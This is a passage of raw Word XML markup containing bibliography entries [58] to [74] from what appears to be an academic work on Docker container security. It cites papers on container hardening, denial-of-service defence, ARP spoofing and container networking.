                      <w:t xml:space="preserve">vol. 17, no. 1, pp. 33-36, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0DFB0177" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1FAA7DD3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[58] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6AA9C517" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>J. Rudenberg, “Docker Image Insecurity,” 23 December 2014. [Online]. Available: https://titanous.com/posts/docker-insecurity. [Accessed 16 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7D603FCA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7173DA3D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[59] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="04885637" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. F. Gonz´alez, F. Lera and G. Esteban, “SecDocker: Hardening the Continuous Integration Workflow Wrapping the container layer,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv e-prints, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-15, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="568CDD2A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="707C10FB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[60] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="62A45CE6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Chelladhurai, P. R. Chelliah and S. A. Kumar, “Securing docker containers from Denial of Service (DoS) attacks,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - 2016 IEEE International Conference on Services Computing, SCC 2016, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 856-859, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4787AC9F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="750D6687" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[61] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1E2333D1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Idhom, R. Alit, A. Fauzi and e. al, “Implementation of Web Server Security Against Denial of Service (DoS) Attacks,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Workshop on Environmental Science, Society, and Technology (WESTECH 2020), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-6, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="389728CD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3AF6257B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[62] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1008B1BC" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Shakeri, L. Veen and P. Grosso, “Evaluation of Container Overlays for Secure Data Sharing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - 2020 IEEE 45th Local Computer Networks Symposium on Emerging Topics in Networking, LCN Symposium 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 99-108, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0C8130B9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1A052075" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[63] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="51BAF621" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Data, “The Defense Against ARP Spoofing Attack Using Semi-Static ARP Cache Table,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">3rd International Conference on Sustainable Information Engineering and Technology, SIET 2018 - Proceedings, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 206-210, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="16897F66" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5336EFCA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[64] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7D99F644" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Khan, O. Rehman and e. al, “Lightweight Testbed for Cybersecurity Experiments in SCADA-based Systems,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 International Conference on Computing and Information Technology, ICCIT 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-5, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3D056C29" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="33E926B9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[65] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="127F69AA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">L. L. Mentz, W. J. Loch and G. P. Koslovski, “Comparative experimental analysis of Docker container networking drivers,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - 2020 IEEE 9th International Conference on Cloud Networking, CloudNet 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-7, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3C1F1CEE" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14132CBA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[66] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3EA78827" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Docker Documentaion, “Use bridge networks,” Docker, [Online]. Available: https://docs.docker.com/network/bridge/. [Accessed 21 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5760858C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="10A5AB5C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[67] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3EAB942E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Nam, S. Lee, H. Seo and e. al, “BASTION: A Security Enforcement Network Stack for Container Networks,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 USENIX Annual Technical Conference, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 81-95, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2B317877" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2CF027B9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[68] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1430B236" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">N. Gelernter, S. Kalma, B. Magnezi and H. Porcilan, “The Password Reset MitM Attack,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - IEEE Symposium on Security and Privacy, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 251-267, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="08D15E32" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="23E74593" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[69] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7A64D1CB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Mouat, Docker Security: Using Containers Safely in Production, O'Reilly Media, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="192F286F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="63176AF8" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[70] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="146F9EE3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">G. I. Radchenko, A. Alaasam and A. N. Tchernykh, “Comparative Analysis of Virtualization Methods in Big Data Processing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Supercomputing Frontiers and Innovations, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 6, no. 1, pp. 48-79, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="6ADBF5B1" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="412EE61E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[71] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3F3EE4CA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. R. Manu, J. K. Patel and S. Akhtar, “A study, analysis and deep dive on cloud PAAS security in terms of Docker container security,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of IEEE International Conference on Circuit, Power and Computing Technologies, ICCPCT 2016, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-13, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5351BA46" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="136D7F1D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[72] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6AB24018" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Maheshwari, S. Deochake, R. De and e. al, “Comparative Study of Virtual Machines and Containers for DevOps Developers,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:1808.08192, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-9, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7DD6B547" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0163FC4E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[73] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="73D2ECE3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">V. Jain, B. Singh and e. al, “Static Vulnerability Analysis of Docker Images,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IOP Conference Series: Materials Science and Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 1131, no. 1, pp. 12-18, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="322AF50B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="30F55111" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[74] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
